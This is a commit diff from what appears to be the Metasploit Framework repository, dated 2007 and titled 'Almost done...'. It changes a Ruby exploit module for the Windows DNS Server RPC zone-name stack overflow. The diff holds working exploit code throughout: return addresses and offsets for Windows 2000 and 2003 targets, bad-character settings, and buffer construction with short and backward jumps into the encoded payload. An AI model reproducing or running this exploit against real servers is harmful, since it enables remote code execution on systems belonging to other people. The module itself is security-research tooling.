Almost done...

git-svn-id: file:///home/svn/framework3/trunk@4683 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-15 21:43:30 +00:00
parent 66a87c8802
commit 17082dda1a
1 changed files with 37 additions and 10 deletions

View File

@ -37,12 +37,16 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx'] ['URL', 'http://www.microsoft.com/technet/security/advisory/935964.mspx']
], ],
'Privileged' => true, 'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' => 'Payload' =>
{ {
'Space' => 1024, 'Space' => 1024,
# The payload doesn't matter, but make_nops() uses these too # The payload doesn't matter, but make_nops() uses these too
'BadChars' => "\x00\x5c\x5f\x31\x32\x33\x34\x35\x36\x37", 'BadChars' => "\x00",
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
@ -50,12 +54,26 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Windows 2000 SP0-SP4 / Windows 2003 SP0-SP2 English',
{
'Addresses' => # Offsets must not overlap -4 or +9
[
[ 1213, 0x75022ac4 ], # Windows 2000 SP0-SP4 ws2help.dll
[ 1593, 0x7ffc0960 ], # Windows 2003 SP0 ??? (unreliable?)
[ 1633, 0x76a81a60 ], # Windows 2003 SP1-SP2 atl.dll
]
}
],
# WS2HELP.DLL # WS2HELP.DLL
[ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ], [ 'Windows 2000 Server SP0-SP4+ English', { 'Off' => 1213, 'Ret' => 0x75022ac4 } ],
# ATL.DLL (checked) # Unknown, probably bad :(
[ 'Windows 2003 Server SP0 Checked/Debug English', { 'Off' => 1597, 'Ret' => 0x7669b5c5 } ], [ 'Windows 2003 Server SP0 English', { 'Off' => 1593, 'Ret' => 0x7ffc0960 } ],
# ATL.DLL (no SafeSEH)
[ 'Windows 2003 Server SP1-SP2 English', { 'Off' => 1633, 'Ret' => 0x76a81a60 } ],
], ],
'DisclosureDate' => 'Apr 13 2007' 'DisclosureDate' => 'Apr 13 2007'
)) ))
@ -89,13 +107,22 @@ class Exploits::Windows::Dcerpc::Microsoft_DNS_RPC_ZoneName < Msf::Exploit::Remo
dcerpc_bind(handle) dcerpc_bind(handle)
print_status("Bound to #{handle} ...") print_status("Bound to #{handle} ...")
txt = Rex::Text.pattern_create(8192) txt = Rex::Text.rand_text_alphanumeric(8192)
txt[0, payload.encoded.length] = payload.encoded txt[0, payload.encoded.length] = payload.encoded
off = target['Off'] if (target['Addresses'])
txt[ off ] = [target.ret].pack('V') target['Addresses'].each do |ent|
txt[ off - 4, 2] = "\xeb\x06" off, ret = ent
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') txt[ off ] = [ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
end
else
off = target['Off']
txt[ off ] = [target.ret].pack('V')
txt[ off - 4, 2] = "\xeb\x06"
txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V')
end
req = '' req = ''